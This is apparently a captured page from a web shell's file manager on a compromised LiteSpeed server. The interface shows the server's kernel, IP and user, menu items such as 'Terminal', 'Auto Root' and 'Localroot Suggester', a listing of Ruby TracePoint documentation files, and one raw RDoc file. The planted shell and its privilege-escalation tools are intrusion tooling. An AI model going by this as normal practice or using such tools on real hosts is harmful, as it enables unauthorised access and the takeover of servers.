Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby26 /
share /
ri /
2.6.0 /
system /
TracePoint /
Delete
Unzip
Name
Size
Permission
Date
Action
__enable-i.ri
1.24
KB
-rw-r--r--
2023-07-26 18:33
binding-i.ri
317
B
-rw-r--r--
2023-07-26 18:33
callee_id-i.ri
324
B
-rw-r--r--
2023-07-26 18:33
cdesc-TracePoint.ri
2.81
KB
-rw-r--r--
2023-07-26 18:33
defined_class-i.ri
1.29
KB
-rw-r--r--
2023-07-26 18:33
disable-i.ri
1.15
KB
-rw-r--r--
2023-07-26 18:33
enable-i.ri
266
B
-rw-r--r--
2023-07-26 18:33
enabled%3f-i.ri
352
B
-rw-r--r--
2023-07-26 18:33
eval_script-i.ri
408
B
-rw-r--r--
2023-07-26 18:33
event-i.ri
365
B
-rw-r--r--
2023-07-26 18:33
inspect-i.ri
371
B
-rw-r--r--
2023-07-26 18:33
instruction_sequence-i.ri
500
B
-rw-r--r--
2023-07-26 18:33
lineno-i.ri
293
B
-rw-r--r--
2023-07-26 18:33
method_id-i.ri
335
B
-rw-r--r--
2023-07-26 18:33
new-c.ri
1.67
KB
-rw-r--r--
2023-07-26 18:33
parameters-i.ri
354
B
-rw-r--r--
2023-07-26 18:33
path-i.ri
291
B
-rw-r--r--
2023-07-26 18:33
raised_exception-i.ri
338
B
-rw-r--r--
2023-07-26 18:33
return_value-i.ri
342
B
-rw-r--r--
2023-07-26 18:33
self-i.ri
443
B
-rw-r--r--
2023-07-26 18:33
stat-c.ri
548
B
-rw-r--r--
2023-07-26 18:33
trace-c.ri
630
B
-rw-r--r--
2023-07-26 18:33
Save
Rename
U:RDoc::AnyMethod[iI" __enable:ETI"TracePoint#__enable;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"Activates the trace;To:RDoc::Markup::BlankLine o; ; [I"'Return true if trace was enabled. ;TI"(Return false if trace was disabled.;T@o:RDoc::Markup::Verbatim; [I"trace.enabled? #=> false ;TI"0trace.enable #=> false (previous state) ;TI"* # trace is enabled ;TI"trace.enabled? #=> true ;TI"/trace.enable #=> true (previous state) ;TI"0 # trace is still enabled ;T:@format0o; ; [I"QIf a block is given, the trace will only be enabled within the scope of the ;TI"block.;T@o;; [I"trace.enabled? ;TI"#=> false ;TI" ;TI"trace.enable do ;TI" trace.enabled? ;TI"' # only enabled for this block ;TI" end ;TI" ;TI"trace.enabled? ;TI"#=> false ;T; 0o; ; [I":Note: You cannot access event hooks within the block.;T@o;; [I""trace.enable { p tp.lineno } ;TI"*#=> RuntimeError: access from outside;T; 0: @fileI"vm_trace.c;T:0@omit_headings_from_table_of_contents_below0I"Otrace.enable -> true or false trace.enable { block } -> obj ;T0[ I" (p1, p2);T@2FI"TracePoint;TcRDoc::NormalClass00